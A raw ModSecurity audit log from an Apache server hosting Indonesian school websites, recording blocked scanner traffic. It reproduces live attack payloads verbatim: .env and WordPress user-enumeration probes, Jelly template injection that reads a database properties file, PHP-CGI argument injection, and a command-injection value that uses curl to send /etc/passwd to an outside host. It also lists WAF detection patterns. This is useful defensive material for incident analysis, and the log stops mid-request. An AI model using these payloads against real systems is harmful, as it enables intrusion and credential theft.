--c30f236b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747966632309981 886 (- - -) Stopwatch2: 1747966632309981 886; combined=355, p1=325, p2=0, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30f236b-Z-- --e38d036f-A-- [23/May/2025:09:42:11 +0700] aC_gg7z70bfNdlplZZO0MQAAAFI 103.236.140.4 41254 103.236.140.4 8181 --e38d036f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.224.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.224.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e38d036f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e38d036f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747968131179098 3388 (- - -) Stopwatch2: 1747968131179098 3388; combined=1512, p1=513, p2=968, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e38d036f-Z-- --10fea055-A-- [23/May/2025:09:50:22 +0700] aC_ibh67_KloOut96EnfOwAAAIQ 103.236.140.4 41352 103.236.140.4 8181 --10fea055-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/115.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 159432971 --10fea055-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --10fea055-E-- --10fea055-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747968622181537 2519 (- - -) Stopwatch2: 1747968622181537 2519; combined=1052, p1=383, p2=634, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fea055-Z-- --dd29ab37-A-- [23/May/2025:10:03:26 +0700] aC_lfrz70bfNdlplZZO0QAAAAFE 103.236.140.4 41486 103.236.140.4 8181 --dd29ab37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.115.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.115.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd29ab37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd29ab37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747969406010317 2769 (- - -) Stopwatch2: 1747969406010317 2769; combined=1395, p1=453, p2=910, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd29ab37-Z-- --5ef86b38-A-- [23/May/2025:10:07:35 +0700] aC_mdx67_KloOut96EnfQgAAAJI 103.236.140.4 41508 103.236.140.4 8181 --5ef86b38-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.70.126.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.70.126.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ef86b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ef86b38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747969655722792 2939 (- - -) Stopwatch2: 1747969655722792 2939; combined=1291, p1=434, p2=828, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ef86b38-Z-- --d1e2dd77-A-- [23/May/2025:10:13:24 +0700] aC_n1Lz70bfNdlplZZO0SQAAAEk 103.236.140.4 41538 103.236.140.4 8181 --d1e2dd77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.219.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.219.116 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --d1e2dd77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1e2dd77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747970004016665 850 (- - -) Stopwatch2: 1747970004016665 850; combined=344, p1=299, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1e2dd77-Z-- --debc6561-A-- [23/May/2025:10:16:10 +0700] aC_oem_WNRyhaqaKDLwiugAAAMA 103.236.140.4 41562 103.236.140.4 8181 --debc6561-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.118.141.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.118.141.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --debc6561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --debc6561-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747970170049488 2816 (- - -) Stopwatch2: 1747970170049488 2816; combined=1256, p1=429, p2=797, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --debc6561-Z-- --9aed371a-A-- [23/May/2025:10:20:42 +0700] aC_pilYzwfxII7zMfyHfRgAAAAo 103.236.140.4 41606 103.236.140.4 8181 --9aed371a-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 193 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 162995131 --9aed371a-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0mbkqa4kqtm561jt3n0b7ki5sir8r4wa.oast.fun) --9aed371a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aed371a-E-- --9aed371a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747970442267018 1545 (- - -) Stopwatch2: 1747970442267018 1545; combined=501, p1=291, p2=140, p3=0, p4=0, p5=70, sr=46, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aed371a-Z-- --370ab93e-A-- [23/May/2025:11:02:07 +0700] aC_zPx67_KloOut96EnfTgAAAI4 103.236.140.4 41828 103.236.140.4 8181 --370ab93e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.122 Safari/537.36 Accept-Charset: utf-8 --370ab93e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --370ab93e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747972927865377 860 (- - -) Stopwatch2: 1747972927865377 860; combined=343, p1=299, p2=0, p3=0, p4=0, p5=44, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --370ab93e-Z-- --2fef5d7d-A-- [23/May/2025:11:02:42 +0700] aC_zYlYzwfxII7zMfyHfXQAAAAI 103.236.140.4 41862 103.236.140.4 8181 --2fef5d7d-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 159433151 --2fef5d7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2fef5d7d-E-- --2fef5d7d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747972962625841 2351 (- - -) Stopwatch2: 1747972962625841 2351; combined=1106, p1=336, p2=744, p3=0, p4=0, p5=25, sr=53, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fef5d7d-Z-- --7a648939-A-- [23/May/2025:11:06:10 +0700] aC_0MlYzwfxII7zMfyHfaAAAAAM 103.236.140.4 41908 103.236.140.4 8181 --7a648939-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433172 --7a648939-C-- --7a648939-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a648939-E-- --7a648939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747973170124614 3715 (- - -) Stopwatch2: 1747973170124614 3715; combined=1983, p1=453, p2=1500, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a648939-Z-- --dfc86517-A-- [23/May/2025:11:06:11 +0700] aC_0M1YzwfxII7zMfyHfaQAAAAI 103.236.140.4 41912 103.236.140.4 8181 --dfc86517-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162995228 --dfc86517-C-- --dfc86517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfc86517-E-- --dfc86517-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747973171534708 2754 (- - -) Stopwatch2: 1747973171534708 2754; combined=1468, p1=332, p2=1112, p3=0, p4=0, p5=24, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc86517-Z-- --c1d9fd4f-A-- [23/May/2025:11:06:12 +0700] aC_0NG_WNRyhaqaKDLwi0gAAANc 103.236.140.4 41918 103.236.140.4 8181 --c1d9fd4f-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433175 --c1d9fd4f-C-- --c1d9fd4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1d9fd4f-E-- --c1d9fd4f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747973172288016 3632 (- - -) Stopwatch2: 1747973172288016 3632; combined=1746, p1=418, p2=1304, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1d9fd4f-Z-- --4662960f-A-- [23/May/2025:11:06:13 +0700] aC_0NVYzwfxII7zMfyHfagAAAAU 103.236.140.4 41922 103.236.140.4 8181 --4662960f-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162995231 --4662960f-C-- --4662960f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4662960f-E-- --4662960f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747973173055048 3246 (- - -) Stopwatch2: 1747973173055048 3246; combined=1849, p1=414, p2=1406, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4662960f-Z-- --2cc93373-A-- [23/May/2025:11:22:24 +0700] aC_4AFYzwfxII7zMfyHfcwAAAAI 103.236.140.4 42028 103.236.140.4 8181 --2cc93373-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.209.152.33 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.209.152.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --2cc93373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cc93373-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747974144575106 761 (- - -) Stopwatch2: 1747974144575106 761; combined=332, p1=291, p2=0, p3=0, p4=0, p5=41, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2cc93373-Z-- --fa1c3733-A-- [23/May/2025:11:46:23 +0700] aC_9nx67_KloOut96Ens6AAAAJA 103.236.140.4 44526 103.236.140.4 8181 --fa1c3733-B-- GET 